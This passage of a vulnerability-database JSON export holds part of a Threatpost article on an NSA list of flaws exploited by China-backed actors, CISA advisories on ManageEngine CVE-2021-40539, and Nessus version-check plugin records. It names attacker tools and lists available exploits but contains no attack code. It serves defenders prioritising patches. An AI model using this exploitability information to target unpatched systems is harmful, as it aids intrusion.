And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches for the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. 
An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. 
\u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:13:24", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have released [a Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) detailing the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution. The FBI, CISA, and CGCYBER assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability. 
The exploitation of this vulnerability poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\n\nCISA strongly encourages users and administrators to review [Joint FBI-CISA-CGCYBER CSA: APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) and immediately implement the recommended mitigations, which include updating to [ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "cisa", "title": "FBI-CISA-CGCYBER Advisory on APT Exploitation of ManageEngine ADSelfService Plus Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 
7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T00:00:00", "id": "CISA:28BCD901AF6661FE02928495E4D03129", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:12:13", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have updated the [Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) published on September 16, 2021, which details the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution.\n\nThe update provides details on a suite of tools APT actors are using to enable this campaign: \n\n * Dropper: a dropper trojan that drops Godzilla webshell on a system \n * Godzilla: a Chinese language web shell \n * NGLite: a backdoor trojan written in Go \n * KdcSponge: a tool that targets undocumented APIs in Microsoft\u2019s implementation of Kerberos for credential exfiltration \n\nNote: FBI, CISA, and CGCYBER cannot confirm the CVE-2021-40539 is the only vulnerability APT actors are leveraging as part of this activity, so it is key that network defenders focus on detecting the tools listed above in addition to initial access vector.\n\nCISA encourages organizations to review the November 19 update and apply the recommended mitigations. 
CISA also recommends reviewing the relevant blog posts from [Palo Alto Networks](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>), [Microsoft](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>), and [IBM Security Intelligence](<https://securityintelligence.com/posts/zero-day-discovered-enterprise-help-desk/>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-19T00:00:00", "type": "cisa", "title": "Updated: APT Exploitation of ManageEngine ADSelfService Plus Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T00:00:00", 
"id": "CISA:906D00DDCD25874F8A28FE348820F80A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:29:35", "description": "On September 16, CISA released [a joint alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) on exploitation of a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus. On November 8, security researchers from Palo Alto Networks and Microsoft Threat Intelligence Center (MSTIC) released separate reports on targeted attacks against ManageEngine ADSelfService Plus. \n\nCISA encourages organizations to review the indicators of compromise and other technical details in the following reports to uncover any malicious activity within their networks.\n\n * Palo Alto Networks: [Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>)\n * MSTIC: [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "cisa", "title": "Security Researchers Reveal Activity Targeting ManageEngine ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:00:00", "id": "CISA:2D62C340878780A9844A8FFDFA548783", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:32", "description": "Zoho has released a security update on a vulnerability (CVE-2021-40539) affecting ManageEngine ADSelfService Plus builds 6113 and below. CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine ADSelfService Plus is a self-service password management and single sign-on solution for Active Directory and cloud apps. 
Additionally, CISA strongly urges organizations to ensure ADSelfService Plus is not directly accessible from the internet.\n\nCISA encourages users and administrators to review the [Zoho advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) for more information and to update to ADSelfService Plus build 6114.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update for ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-08T00:00:00", "id": "CISA:01AC83B2C29761024423083A8BE9CE80", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:49", "description": "Zoho has released a security update on a vulnerability (CVE-2020-10189) affecting ManageEngine Desktop Central build 10.0.473 and below. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to control servers, laptops, smartphones, and tablets from a central location.\n\nThe Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the [Zoho security update](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for more information and apply the [patch](<https://www.manageengine.com/products/desktop-central/service-packs.html>).\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update on ManageEngine Desktop 
Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:09:54", "description": "On August 25, 2021, Atlassian released security updates to address a remote code execution vulnerability (CVE-2021-26084) affecting Confluence Server and Data Center. Recently, CVE-2021-26084 has been detected in exploits in the wild. 
A remote attacker could exploit this vulnerability to take control of an affected system.\n\nCISA urges users and administrators to review [Atlassian Security Advisory 2021-08-25](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and immediately apply the necessary updates.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Updates for Confluence Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-03T00:00:00", "id": "CISA:D7188D434879621A3A83E708590EAE42", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-05-04T15:28:24", "description": "According to its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is prior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported build number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-08T00:00:00", "type": "nessus", "title": "ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus"], "id": "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "href": "https://www.tenable.com/plugins/nessus/153147", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153147);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2021-40539\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"IAVA\", value:\"2021-A-0561\");\n\n script_name(english:\"ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to 
its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is\nprior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An\nunauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported build\nnumber.\");\n # https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74285241\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine ADSelfService Plus build 6114 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40539\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine ADSelfService Plus CVE-2021-40539');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_adselfservice_plus\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_adselfservice_detect.nasl\");\n script_require_keys(\"installed_sw/ManageEngine ADSelfService Plus\");\n script_require_ports(\"Services/www\", 8888);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar app, app_info, constraints, port;\n\napp = 'ManageEngine ADSelfService Plus';\n\n# Exit if app is not detected on this http port\nport = get_http_port(default:8888);\n\napp_info = vcf::zoho::fix_parse::get_app_info(\n app: app,\n port: port,\n webapp: TRUE\n);\n\nconstraints = [\n { 'fixed_version':'6114', 'fixed_display':'build 6114'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:33:47", "description": "The Zoho ManageEngine ADSelfService Plus running on the remote host is affected by an authentication bypass vulnerability in the REST API which can lead to remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-08T00:00:00", "type": "nessus", "title": "ManageEngine ADSelfServicePlus Authentication Bypass (CVE-2021-40539)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus"], "id": "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/154964", "sourceData": "Binary data manageengine_adselfservice_plus_CVE-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2022-05-04T15:30:45", "description": "The ManageEngine EventLog Analyzer running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-04T00:00:00", "type": "nessus", "title": "ManageEngine EventLog Analyzer < Build 12201 REST API Restriction Bypass RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_eventlog_analyzer"], "id": "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/153848", "sourceData": "Binary data manageengine_eventlog_analyzer_cve-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:28:01", "description": "The ManageEngine Log360 running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. 
An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-24T00:00:00", "type": "nessus", "title": "ManageEngine Log360 < Build 5229 REST API Restriction Bypass RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_log360"], "id": "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/153636", "sourceData": "Binary data manageengine_log360_cve-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:23:35", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479.\nIt is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "href": "https://www.tenable.com/plugins/nessus/135293", "sourceData": "Binary data manageengine_desktop_central_cve-2020-10189.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:54:26", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. 
It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code 